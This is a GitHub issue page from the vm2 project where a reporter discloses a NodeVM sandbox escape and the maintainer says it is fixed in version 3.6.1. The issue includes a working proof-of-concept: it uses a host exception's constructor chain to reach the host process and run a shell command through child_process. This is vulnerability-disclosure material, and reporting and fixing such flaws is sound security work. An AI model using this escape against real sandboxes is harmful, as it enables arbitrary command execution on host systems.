Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

VM Escape #138

Closed
eugenekolo opened this issue Jun 27, 2018 · 1 comment
Closed

VM Escape #138

eugenekolo opened this issue Jun 27, 2018 · 1 comment

Comments

@eugenekolo
Copy link

It's possible to escape the NodeVM through access to host objects, specifically through an exception. Some host objects are accessible from the VM's pseudo Nodejs events.

In fact, the next escape will always be there from somebody clever. Nodejs's vm module that this builds upon states:

The vm module is not a security mechanism. Do not use it to run untrusted code.

I don't believe something that builds upon it can claim to be secure to untrusted code as the README states.

const {NodeVM} = require('vm2'); 
nvm = new NodeVM()

nvm.run(`
    try {
        this.process.removeListener(); // or .on, .once, or anything that throws a host exception
    } 
    catch (host_exception) {
        console.log('host exception: ' + host_exception.toString());
        host_constructor = host_exception.constructor.constructor;
        host_process = host_constructor('return this')().process;
        console.log('host execution: ' + host_process.mainModule.require('child_process').execSync('id').toString());
    }
patriksimek added a commit that referenced this issue Jun 27, 2018
@patriksimek
Copy link
Owner

patriksimek commented Jun 27, 2018

@eugenekolo Thank you for reporting the issue; it's fixed in 3.6.1.

The statement on Node's VM module is really important because Node's internal VM is not intended to run untrusted code. That's why I started this project - to make an additional layer that makes the context secure enough to run untrusted code.

And as with every software out there that claims to be secure - it is safe until someone finds the way how to break it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants